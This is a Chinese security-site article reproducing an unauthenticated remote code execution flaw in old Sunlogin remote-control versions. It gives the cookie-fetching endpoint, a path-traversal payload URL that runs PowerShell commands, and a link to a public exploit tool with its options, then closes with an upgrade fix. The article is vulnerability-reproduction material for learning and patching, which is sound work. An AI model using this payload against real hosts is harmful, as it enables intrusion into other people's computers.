freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

向日葵远程代码执行漏洞(CNVD-2022-10270CNVD-2022-03672)
2022-03-21 16:17:21
所属地 北京

1.漏洞原理:

向日葵本是一款远程控制工具,可远程控制电脑手机等。漏洞成因主要是低版本下存在未授权访问漏洞,当你打开先日葵(旧版)后,未授权的端口自然也被打开,然而攻击者可以通过此端口不需要密码获取session,借助session远程执行任意命令,进而获取服务器权限。

2.影响版本:

向日葵个人版 windows 11.0.0.33以下(包含0.33)

向日葵简约版 windows V1.0.1.43315 (2021.12)

3.漏洞复现:

3.1.手工复现

3.1.1.打开向日葵,cmd执行tasklist查看进程信息,发现三个进程号与向日葵有关
image
3.1.2.cmd执行 netstat -ano | findstr PID 对进程逐一排查
image
3.1.3.端口扫描器对本机IP进行扫描
image
3.1.4.发现端口开放在0.0.0.0上
image
3.1.5.访问http://本机ip:1138
image
3.1.6.获取cookie,url后面加上 /cgi-bin/rpc?action=verify-haras

访问http://本机ip:1138/cgi-bin/rpc?action=verify-haras
image
3.1.7.构造payload,漏洞发生在接口/check处,当参数cmd的值以ping或者nslookup开头时可以构造命令实现远程命令执行

http://本机ip:1138/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami

http://本机ip:1138/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami

3.1.8.用burpsuite工具进行抓包,请求包中添加获取的cookie
image
image
3.1.9.进而获取到命令执行的结果

image-20220321150902428

3.2.工具复现

3.2.1.工具下载地址:https://github.com/Mr-xn/sunlogin_rce 内置旧版本向日葵(漏洞版)
image

工具说明:

-h 指定目标

-t 选择扫描或者命令执行 默认scan

-p 设置扫描端口范围 默认4w到65535

-c 需要执行的命令

image

4.修复方案

向日葵官网下载最新版本

本文内容及使用工具仅限学习交流,用户滥用造成的一切后果均与作者无关,作者不承担任何直接责任, 后果均由用户本人负责,使用者请务必遵守当地法律法规。

# 渗透测试 # web安全
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录